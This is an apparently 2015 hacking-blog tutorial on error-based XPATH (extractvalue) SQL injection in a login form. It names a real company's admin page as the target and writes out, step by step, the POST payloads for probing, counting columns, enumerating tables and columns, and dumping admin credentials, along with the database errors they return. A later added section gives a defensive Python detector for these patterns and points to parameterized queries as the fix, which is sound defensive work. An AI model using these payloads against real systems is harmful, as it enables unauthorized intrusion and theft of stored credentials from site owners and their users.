Friday 17 July 2015

XPATH Injection in Login Panel

In our previous tutorial we discussed bypassing a login panel with SQL queries.
Sometimes, though, we find an SQL injection vulnerability in a login panel, but executing SQL queries there does not give access to the login panel. In such cases we inject the login panel with XPATH injection and dump the admin details from it.

We will start with manual SQL injection. Because we are injecting through POST parameters, we need the Live HTTP Headers add-on to send POST parameters to the login panel.
Here is the target site:

http://www.almoayedgroup.com/admin

Now open Live HTTP Headers in Mozilla Firefox. As you can see, the admin login panel has username and password boxes. Insert some text there and click the Log In button.

After clicking the Log In button, search for the POST parameters in Live HTTP Headers. Here is the POST request that we sent to the server.

From the above picture you can see that these are our POST request parameters:
POST REQUEST:user_id=raijee&password=12345&submit=Sign+In
Now let's add a single quote ' after the user_id value (user_id=raijee') to check whether the login panel is vulnerable to SQL injection. After adding the single quote to our query, send the POST request to the server by clicking the Replay button.
After the POST request is sent, the server returns an SQL error!

This means it is vulnerable to SQL injection. Let's count the columns so we can prepare our UNION-based command. We will send POST requests to the server to count the number of columns.
Take the POST parameters from above and add an ORDER BY command to count the columns:
POST REQUEST:user_id=raijee' order by 2%23&password=12345&submit=Sign+In
It gives no error!

POST REQUEST:user_id=raijee' order by 5%23&password=12345&submit=Sign+In
Again, no error!

POST REQUEST:user_id=raijee' order by 6%23&password=12345&submit=Sign+In
Here we get an error!

Error:Invalid query:Unknown column '6' in 'order clause'
So there are 5 columns in total. Now let's prepare our UNION-based command and send a POST request to the server:
 

POST REQUEST:user_id=raijee' and 0 union select 1,2,3,4,5%23&password=12345&submit=Sign+In
But it doesn't give us any output there, so now let's try XPATH injection instead.
This is our XPATH query for the version. You can use XPATH with Extractvalue or UpdateXML.
Let's send a POST request to get the version with XPATH injection using Extractvalue.


POST REQUEST:user_id=raijee' and extractvalue(0x3a,concat(0x3a,version()))%23&password=12345&submit=Sign+In
Here we get the version.

Invalid query:XPATH syntax error: ':5.5.32-log'
Next we have to get the tables from the database. Here is the query for the tables; send it as a POST request.
POST REQUEST:user_id=raijee' and extractvalue(0x3a,concat(0x3a,(select concat(table_name) from information_schema.tables where table_schema=database() limit 0,1)))%23&password=12345&submit=Sign+In

Increase the LIMIT for the other tables. After getting the tables, the next part is getting the columns from the tables. This is our query:

POST REQUEST:user_id=raijee' and extractvalue(0x3a,concat(0x3a,(select concat(column_name) from information_schema.columns where table_name='TABLE_NAME_HERE' limit 0,1)))%23&password=12345&submit=Sign+In


After getting the columns from the tables, the final part is to dump the data from the columns.
This is the final query:

POST REQUEST:user_id=raijee' and extractvalue(0x3a,concat(0x3a,(select concat(COLUMN_NAME_HERE) from TABLE_NAME_HERE)))%23&password=12345&submit=Sign+In
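
For defenders, the request bodies and error strings shown in this post are distinctive enough to catch in request and response logs. The following is an added example, not part of the original post: a Python sketch that scans urlencoded POST bodies for the patterns used above and checks responses for leaked database errors. The function names, rule names and the benign sample body are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl

# Heuristic rules derived from the request bodies shown in this post.
RULES = {
    "quote_then_comment": re.compile(r"'.*(#|--\s)", re.S),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "xpath_error_func": re.compile(r"\b(extractvalue|updatexml)\s*\(", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.", re.I),
}

# Error text the post shows being echoed back to the client.
DB_ERROR = re.compile(
    r"XPATH syntax error|Unknown column '[^']*' in 'order clause'|Invalid query:",
    re.I,
)

def scan_body(body):
    """Return {parameter: [matched rule names]} for a urlencoded POST body."""
    hits = {}
    # parse_qsl decodes %23 to '#' and '+' to a space before matching.
    for name, value in parse_qsl(body, keep_blank_values=True):
        matched = sorted(rule for rule, rx in RULES.items() if rx.search(value))
        if matched:
            hits[name] = matched
    return hits

def leaks_db_error(response_text):
    """True if a response body exposes a raw MySQL error to the client."""
    return bool(DB_ERROR.search(response_text))

# Sample bodies: the first is constructed, the others are copied from the post.
SAMPLES = [
    "user_id=alice&password=correct+horse&submit=Sign+In",
    "user_id=raijee' order by 6%23&password=12345&submit=Sign+In",
    "user_id=raijee' and extractvalue(0x3a,concat(0x3a,version()))%23"
    "&password=12345&submit=Sign+In",
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(scan_body(body) or "clean", "<-", body[:60])
    print(leaks_db_error("Invalid query:XPATH syntax error: ':5.5.32-log'"))
```

Treat hits as triage signals: the quote_then_comment rule can fire on a legitimate password containing both characters. The underlying fix is still parameterized queries in the login handler, with database errors logged server-side rather than returned in the response.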

If you have not read the tutorials about XPATH injection, first go and read:
XPATH Injection Using Extractvalue

XPATH Injection Using UpdateXML

AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee
